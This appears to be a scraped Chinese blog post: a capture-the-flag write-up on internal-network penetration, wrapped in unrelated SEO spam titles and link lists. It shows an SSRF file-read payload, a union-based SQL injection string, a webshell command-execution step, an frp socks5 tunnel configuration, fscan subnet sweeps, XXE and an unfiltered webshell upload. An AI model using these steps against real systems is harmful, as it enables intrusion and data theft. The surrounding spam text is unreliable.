当前位置: 首页 > news >正文

手机网站绑定域名是什么意思南宁物流公司网站建设

手机网站绑定域名是什么意思,南宁物流公司网站建设,毕业答辩ppt模板免费下载 素材,学校类网站建设的分析前言 本题一共八个flag,主要是为了练习内网渗透的思路。 解题思路 首先给了一个站长之家-模拟蜘蛛爬取,这个以前见到过,存在sstf漏洞,直接读取文件。 file:///flag既然是要内网渗透,那肯定要看/etc/hosts。 file:…

前言

本题一共八个flag,主要是为了练习内网渗透的思路。

解题思路

首先给了一个站长之家-模拟蜘蛛爬取,这个以前见到过,存在sstf漏洞,直接读取文件。

file:///flag

image-20230401151523662

既然是要内网渗透,那肯定要看/etc/hosts。

file:///etc/hosts

image-20230401151604719

爆破192.168.0.2端口,发现存在192.168.0.10,是一个被黑的页面。

image-20230401151701056

尝试访问shell文件,发现shell.php可命令执行。

image-20230401151752137

想传入一句话木马连接蚁剑,首先需要内网穿透开启代理,利用wget将所需要的文件下载上去。

image-20230401151905244

然后启动frpc服务,需要先在vps上启动frps,代理连接后即可传入一句话木马来连接蚁剑。

命令:
vps ./frps -c frps.ini (先运行)
靶机 ./frpc -c frpc.ini

frpc.ini配置文内容

[common]
server_addr = vps
server_port = 7000[socks5]
type = tcp 
remote_port = 7001
plugin = socks5

image-20230401152328331

在html下和根目录下各有一个flag。

然后上传fscan扫描10.10.0.0/24和192.168.0.0/24。

192.168.0.138为分数查询系统,存在sql注入。

4 union select 1,2,3,(select+*+from+flag)#

在192.168.0.250中存在登录框,登录成功后并无回显,最后xxe尝试成功,在html下和根目录下各有两个flag。

image-20230401152851242

又在10.10.0.22中发现bugku管理页面,存在admin.php后台。

admin admin登陆成功。

发现有文件上传功能且没有过滤,可直接传入一句话木马,在html目录和根目录下各有两个flag。

image-20230401153217305
因为环境已经到时,不想再用20金币开启,所以后边写的较简略。

http://www.yayakq.cn/news/663359/

相关文章:

  • 婚恋网站开发平台代理招商网站建设哪家不错
  • 想要去网站做友情链接怎么发邮件百度电脑版入口
  • 有什么网站做交流会专门做加盟的网站
  • 做境外旅游的网站北京最新新闻报道
  • 淘宝网站的建设wordpress页面上分页
  • 怎么做英文的网站苏州工业园区属于哪个区
  • 网站备案 备注关联性北京管理咨询公司
  • 自己做网站排名好吗网站域名在哪里看
  • 经典网站建设方案东莞网站seo技术
  • 网站开发的后台技术免费主机免费域名
  • 宁波网络营销平台网站建设和优化的步骤
  • 用dw制作网站建设网站建设的大公司排名
  • 网站推广和seo网络营销推广方法包括有哪些
  • 国内购物网站排名wordpress 视频播放插件
  • 多元 集团 网站建设方案永久个人自助建站
  • 深圳网站制作哪里好wordpress上站工具
  • 平面设计网站排行榜网站套用
  • 邢台企业做网站哪儿好温州网站排名优化公司哪家好
  • 网站正在建设中 模板网站快照工具
  • 创办网站要多少钱鄞州区优秀营销型网站建设首选
  • 购物网站制作流程在网站后台做网页
  • 中国建设银行网站首页下载东莞网站开发多少钱
  • 学院网站建设新闻简报电子商务网站名称
  • 网站的设计与开发的图片网站后台更新内容后
  • 贤邦网站建设app开发天津网站建设是什么
  • 专业提供网站建设服务的企业睢县房产网站建设
  • 自己做返利网站开发公司绩效考核
  • 白酒网站源码应用商店手机版下载
  • 江门网站制作网站百度站长app
  • 手机网站开发服务商新闻热点事件2024最新